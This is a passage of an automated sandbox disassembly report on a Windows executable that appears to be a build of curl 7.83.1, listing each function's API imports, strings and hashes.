                                    Similarity
                                    • API ID: ConditionMask$InfoVerifyVersion$AddressHandleModuleProc
                                    • String ID: RtlVerifyVersionInfo$ntdll
                                    • API String ID: 574519269-1699696460
                                    • Opcode ID: 85d730e38de32e9d69f08960004b9955a85abbd7e6d29cb803ab08c89b91870b
                                    • Instruction ID: eb3089ac71cd3a54278fb43f3736040ff4171399d09bd1b47ba5160b3029dfb6
                                    • Opcode Fuzzy Hash: 85d730e38de32e9d69f08960004b9955a85abbd7e6d29cb803ab08c89b91870b
                                    • Instruction Fuzzy Hash: 5831E372448380EFD7018F35AC19FBBBBA8FB85709F04091DF580B6191C7F089888B62
                                    Function 00E0E407 Relevance: 17.9, APIs: 5, Strings: 5, Instructions: 403COMMON
                                    Download Yara Rule
                                    APIs
                                    • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(DL% UL% Dled Uled Xfers Live Qd Total Current Left Speed,?,?,?,?,00000000), ref: 00E0E483
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: fputs
                                    • String ID: %-3s %-3s %s %s %5I64d %5I64d %5I64d %s %s %s %s %5s$%3I64d$--:--:--$DL% UL% Dled Uled Xfers Live Qd Total Current Left Speed$hv
                                    • API String ID: 1795875747-1852112861
                                    • Opcode ID: 80695bfc8bd03b0e60f81aa2ec4588822f340f82e9497b851310ca2c0b074312
                                    • Instruction ID: 3ea1c779a9e366913f1807a17a9d29da0bfa58dc3b3a3f1b3109ecb6b84801ea
                                    • Opcode Fuzzy Hash: 80695bfc8bd03b0e60f81aa2ec4588822f340f82e9497b851310ca2c0b074312
                                    • Instruction Fuzzy Hash: 19027971D002589FCB14CFA8E885AAEBBF5BF48304F1855AAE409BB352D7716D89CF50
                                    Function 00E1760D Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 252networkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E17728
                                    • send.WS2_32(?,00000000,00000000,00000000), ref: 00E177EA
                                    • WSAEventSelect.WS2_32(?,?,00000000), ref: 00E1781C
                                    • WSAWaitForMultipleEvents.WS2_32(00000001,000000DC,00000000,000003E8,00000000,00000000,00000000,00000000), ref: 00E17879
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E178B1
                                    • WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 00E178EE
                                    • WSAEventSelect.WS2_32(?,?,00000000), ref: 00E17900
                                    • WSAResetEvent.WS2_32(?), ref: 00E17925
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E17948
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: Event$EventsSelectfree$EnumMultipleNetworkResetWaitmallocsend
                                    • String ID: 2
                                    • API String ID: 760094153-450215437
                                    • Opcode ID: a47645055d48153a4db2eed9dd047378f12b863f12a16cca7d8ad921df4c16fc
                                    • Instruction ID: eb044766cf2c8c68f2b84f7d06fd1fdf7dbca722257f2ab0409c92daa6b66318
                                    • Opcode Fuzzy Hash: a47645055d48153a4db2eed9dd047378f12b863f12a16cca7d8ad921df4c16fc
                                    • Instruction Fuzzy Hash: 2DA1E231A047299FDB288F24DC84BE9B7B6EF45714F1082A9D59AB7290DB309DC5CF41
                                    Function 00E1EE55 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 243COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00E1E407: htons.WS2_32(?), ref: 00E1E43C
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?), ref: 00E1EEDE
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E1EEE6
                                      • Part of subcall function 00E1A0B8: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00E1A0C3
                                      • Part of subcall function 00E1A0B8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E1A0CB
                                      • Part of subcall function 00E1A0B8: __sys_nerr.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E1A0DD
                                      • Part of subcall function 00E1A0B8: __sys_errlist.API-MS-WIN-CRT-RUNTIME-L1-1-0(000000FF), ref: 00E1A0EC
                                      • Part of subcall function 00E1A0B8: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 00E1A0F6
                                      • Part of subcall function 00E1A0B8: _strrchr.LIBCMT ref: 00E1A142
                                      • Part of subcall function 00E1A0B8: _strrchr.LIBCMT ref: 00E1A15C
                                      • Part of subcall function 00E1A0B8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E1A173
                                      • Part of subcall function 00E1A0B8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E1A180
                                      • Part of subcall function 00E1A0B8: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00E1A188
                                      • Part of subcall function 00E1A0B8: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 00E1A193
                                      • Part of subcall function 00E1F3FC: closesocket.WS2_32(00E21EF4), ref: 00E1F433
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: _errno$ErrorLast$_strrchr$__sys_errlist__sys_nerrclosesockethtonsstrncpy
                                    • String ID: Trying %s:%d...$*$0kv@qv@/lv$Immediate connect fail for %s: %s$sa_addr inet_ntop() failed with errno %d: %s
                                    • API String ID: 1577232418-1871448354
                                    • Opcode ID: 02de9703e48bdc72e117676b6e9c90846d43fe57a3539c50b6bdab14602feb97
                                    • Instruction ID: 8cc7f04264dd2c98b9825a48f53a5c35599e681e5953cc6fa8561f4c3648dc2a
                                    • Opcode Fuzzy Hash: 02de9703e48bdc72e117676b6e9c90846d43fe57a3539c50b6bdab14602feb97
                                    • Instruction Fuzzy Hash: 68919231A012589FDF259B24DC947EDB7B6AF49314F1414EAEC09B7291DA319EC5CF80
                                    Function 00E4D350 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 224COMMON
                                    Download Yara Rule
                                    APIs
                                    • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E4CB20
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E4CB42
                                    • realloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E4CB9C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: callocmallocrealloc
                                    • String ID: $ $ $-$>
                                    • API String ID: 3005434335-2764683982
                                    • Opcode ID: 37a1eb854e60728cd81f1bba5cc14e110c94d340860f43f0338653d61f6b6968
                                    • Instruction ID: 013e2255e424ba9a60214e758bbe44d2e6510e4b14dedd8646e2cd826bdb7c83
                                    • Opcode Fuzzy Hash: 37a1eb854e60728cd81f1bba5cc14e110c94d340860f43f0338653d61f6b6968
                                    • Instruction Fuzzy Hash: 8681DA31B19A12DFD728CF29E944764BBF2FB08318F24951AC416A7A91D335F894CB82
                                    Function 00E14D10 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 199COMMON
                                    Download Yara Rule
                                    APIs
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E14D69
                                    • _strrchr.LIBCMT ref: 00E14D7E
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E14D8E
                                    • _strrchr.LIBCMT ref: 00E14DE2
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E14E13
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E14E1F
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00E09BEA,?,00000208,?,?,?,?,?,00E0A827,?,?,00000000), ref: 00E14E73
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00E09BEA,?,00000208,?,?,?,?,?,00E0A827,?,?,00000000), ref: 00E14E8E
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00E09BEA,?,00000208,?,?), ref: 00E14EE0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: ___from_strstr_to_strchr$_strrchrfree$malloc
                                    • String ID: )i
                                    • API String ID: 3226260525-955181114
                                    • Opcode ID: e68df37fb9ea259a188ea1c1203b8b3607b13c93d8c3b1f47199effa8a8ac54a
                                    • Instruction ID: ff8a57e4ded9a63d02317cfa703283d0edabbf497ee7703c8d89a07eef356617
                                    • Opcode Fuzzy Hash: e68df37fb9ea259a188ea1c1203b8b3607b13c93d8c3b1f47199effa8a8ac54a
                                    • Instruction Fuzzy Hash: 63515BB29083469FDF258F68A8547EE7BE4AF12358F2814BED441BB3C2EA705C85C751
                                    Function 00E0D136 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 177stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • _strrchr.LIBCMT ref: 00E0D165
                                    • _strrchr.LIBCMT ref: 00E0D16F
                                    • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(00E574AB), ref: 00E0D198
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000002), ref: 00E0D1D9
                                    • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000,00000001), ref: 00E0D1F4
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000), ref: 00E0D27A
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E0D2A4
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E0D2BD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free$_strrchr$_strdupmallocstrncpy
                                    • String ID: ://$|<>"?*
                                    • API String ID: 1245388853-1792949323
                                    • Opcode ID: b807015150987dd9e1a869a5a00cc92aa50c209ecde2ba7c02bfb008250e626e
                                    • Instruction ID: 6cf308f018beae66f964d2bfecd765899b1ee8a3fc0ddf8f3d116e343ad78a39
                                    • Opcode Fuzzy Hash: b807015150987dd9e1a869a5a00cc92aa50c209ecde2ba7c02bfb008250e626e
                                    • Instruction Fuzzy Hash: 20516A32A0D7129FDB359BE89C657BABBE59F42314F242465D841FB2E2DA30CDC09790
                                    Function 00E4F1D2 Relevance: 17.7, APIs: 4, Strings: 6, Instructions: 164COMMON
                                    Download Yara Rule
                                    APIs
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E4F232
                                    • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 00E4F280
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E4F309
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E4F359
                                    Strings
                                    • schannel: connection hostname (%s) validated against certificate name (%s), xrefs: 00E4F2C9
                                    • schannel: connection hostname (%s) did not match against certificate name (%s), xrefs: 00E4F2E0
                                    • schannel: CertGetNameString() failed to match connection hostname (%s) against server certificate names, xrefs: 00E4F33A
                                    • schannel: CertGetNameString() returned certificate name information of unexpected size, xrefs: 00E4F254
                                    • schannel: server certificate name verification failed, xrefs: 00E4F328
                                    • schannel: CertGetNameString() returned no certificate name information, xrefs: 00E4F20E
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free$_strdupmalloc
                                    • String ID: schannel: CertGetNameString() failed to match connection hostname (%s) against server certificate names$schannel: CertGetNameString() returned certificate name information of unexpected size$schannel: CertGetNameString() returned no certificate name information$schannel: connection hostname (%s) did not match against certificate name (%s)$schannel: connection hostname (%s) validated against certificate name (%s)$schannel: server certificate name verification failed
                                    • API String ID: 111713529-4178580626
                                    • Opcode ID: 29eed48160fd6515cb87c77247f7164519fabc029eb8eed199db5359d4626576
                                    • Instruction ID: bf355fd40c01a6bfda3c720dd23022f336010c28e04075b9edef0169588fd7cc
                                    • Opcode Fuzzy Hash: 29eed48160fd6515cb87c77247f7164519fabc029eb8eed199db5359d4626576
                                    • Instruction Fuzzy Hash: E1414636A44200ABDF259F68FC00AEE7BE5DB81B54F20207AE845B7291DAB05D41CBA4
                                    Function 00E26D23 Relevance: 17.6, APIs: 14, Instructions: 107COMMON
                                    Download Yara Rule
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,00E21751,?,00000000,?,?,?,00E08BF9), ref: 00E26D39
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,?,?,00E08BF9), ref: 00E26D52
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00E08BF9), ref: 00E26D69
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00E08BF9), ref: 00E26D80
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E26D97
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E26DAE
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E26DC5
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E26DDC
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E26DF3
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E26E0A
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E26E21
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E26E38
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E26E4F
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E26E66
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free
                                    • String ID:
                                    • API String ID: 1294909896-0
                                    • Opcode ID: 0aa0ad6459a1be1d2a459ded96bf9200d59001bfdb177b25e51e7a708a33075f
                                    • Instruction ID: fe5c263b262bd45d65d1fdd4ecedebe5a62966e1aa4b9958288ec0613712bc4d
                                    • Opcode Fuzzy Hash: 0aa0ad6459a1be1d2a459ded96bf9200d59001bfdb177b25e51e7a708a33075f
                                    • Instruction Fuzzy Hash: 72418072914625EFCB486F26FC5445DBBA5FF48251314952BD406A3A71CBF47C288FD0
                                    Function 00E428A4 Relevance: 16.7, APIs: 5, Strings: 6, Instructions: 229COMMON
                                    Download Yara Rule
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?), ref: 00E42A8C
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?), ref: 00E42A9E
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?), ref: 00E42ABA
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?), ref: 00E42ACE
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?), ref: 00E42AE7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free
                                    • String ID: /$MAILINDEX$PARTIAL$SECTION$UID$UIDVALIDITY
                                    • API String ID: 1294909896-4153388952
                                    • Opcode ID: c2ccddafce22c81944cd21d994d2f0d5753c88f0d789975fdffa6306799c7871
                                    • Instruction ID: e14247729fe2bdaea040169cde253298d2ea05da955284851639d8f71ec573f2
                                    • Opcode Fuzzy Hash: c2ccddafce22c81944cd21d994d2f0d5753c88f0d789975fdffa6306799c7871
                                    • Instruction Fuzzy Hash: 9581E130A04245DFDF34DF64E850ABDBBA5EF84344F54A06EEA41B3252EB70AD44EB51
                                    Function 00E30AF6 Relevance: 16.6, APIs: 1, Strings: 10, Instructions: 140COMMON
                                    Download Yara Rule
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E30C07
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free
                                    • String ID: %s auth using %s with user '%s'$Authorization$Authorization: Bearer %s$Bearer$NTLM$Negotiate$Proxy$Proxy-authorization$Server$m
                                    • API String ID: 1294909896-907431127
                                    • Opcode ID: 9d1fb229d69d98593d4d7c5ff209d034f95201d38c518c9322b269da7e8b49ce
                                    • Instruction ID: 926a3ce3dd1fbb760a2de9f47469c11242e01ddbe790f83a093fc222093aa156
                                    • Opcode Fuzzy Hash: 9d1fb229d69d98593d4d7c5ff209d034f95201d38c518c9322b269da7e8b49ce
                                    • Instruction Fuzzy Hash: 97416931344205ABCF28AA24A8697BEFBE6AFC0398F24B11EE445B7281CB719D44D751
                                    Function 00E40710 Relevance: 16.1, APIs: 3, Strings: 6, Instructions: 375COMMON
                                    Download Yara Rule
                                    APIs
                                    • _fstat64.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(?,?), ref: 00E4078E
                                      • Part of subcall function 00E404E4: ___from_strstr_to_strchr.LIBCMT ref: 00E40503
                                    Strings
                                    • Content-Length: %I64d, xrefs: 00E40851
                                    • Can't get the size of file., xrefs: 00E409AF
                                    • failed to resume file:// transfer, xrefs: 00E40A3D
                                    • Last-Modified: %s, %02d %s %4d %02d:%02d:%02d GMT%s, xrefs: 00E40935
                                    • X#, xrefs: 00E408ED
                                    • Accept-ranges: bytes, xrefs: 00E40820
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: ___from_strstr_to_strchr_fstat64
                                    • String ID: Accept-ranges: bytes$Can't get the size of file.$Content-Length: %I64d$Last-Modified: %s, %02d %s %4d %02d:%02d:%02d GMT%s$X#$failed to resume file:// transfer
                                    • API String ID: 1237401293-2088981783
                                    • Opcode ID: 9bec41f6c83d06293b2d9fabe5da62becad104b288ba843b4d8b1ef605ddd37c
                                    • Instruction ID: b79a97b996735be57105d7f8ca2574171fbfbe0df5d5a156fa11e59223c1fffe
                                    • Opcode Fuzzy Hash: 9bec41f6c83d06293b2d9fabe5da62becad104b288ba843b4d8b1ef605ddd37c
                                    • Instruction Fuzzy Hash: B7D1C6716083419FEB24DE28E841B6B77E5EFC4358F04553DFE89AB292EA709C448B52
                                    Function 00E08599 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 196COMMON
                                    Download Yara Rule
                                    APIs
                                    • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00E085D1
                                    • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00E0861E
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E0864D
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000310), ref: 00E0867C
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00E086F7
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00E08795
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free$_strdup$malloc
                                    • String ID: %s$--url$option %s: %s
                                    • API String ID: 854390910-3421415073
                                    • Opcode ID: 87c11e3d8656038a5016b106d6dc67aa6c867bfc157cf7d741e704b472bb04c0
                                    • Instruction ID: 98b3fc4680566844d2f9af7501fd192dc637aa4c6bf78092b72cbaaabcea5ff4
                                    • Opcode Fuzzy Hash: 87c11e3d8656038a5016b106d6dc67aa6c867bfc157cf7d741e704b472bb04c0
                                    • Instruction Fuzzy Hash: 18612431A00205AFCB29CB68D644ABEBBF1AB44314F2954AAE5C5F73D2DE708CC0CB40
                                    Function 00E07E68 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 91fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00E07E8E
                                    • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,00E57A20), ref: 00E07EA0
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E07EB2
                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00E07ECF
                                    • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00E07EDB
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E07F11
                                    • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00E07F21
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: __acrt_iob_funcfree$_strdupfclosefopen
                                    • String ID: <stdin>$Failed to read %s
                                    • API String ID: 229151352-3349806160
                                    • Opcode ID: d18b079208547dfbd35e68ec1a37e98da00b449edb2bdb235b519fb3f99abeff
                                    • Instruction ID: 15bd1743338f3184681a726cd8570e894582ddede0a8192ea57bada5296e254f
                                    • Opcode Fuzzy Hash: d18b079208547dfbd35e68ec1a37e98da00b449edb2bdb235b519fb3f99abeff
                                    • Instruction Fuzzy Hash: 4B31CF326097429FC7158F3498446ABBBE5AF95355F142C5DE4DAA3180DB319C868B41
                                    Function 00E0DA2F Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 88COMMON
                                    Download Yara Rule
                                    APIs
                                    • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(curl/7.83.1), ref: 00E0DAFA
                                    Strings
                                    Memory Dump Source
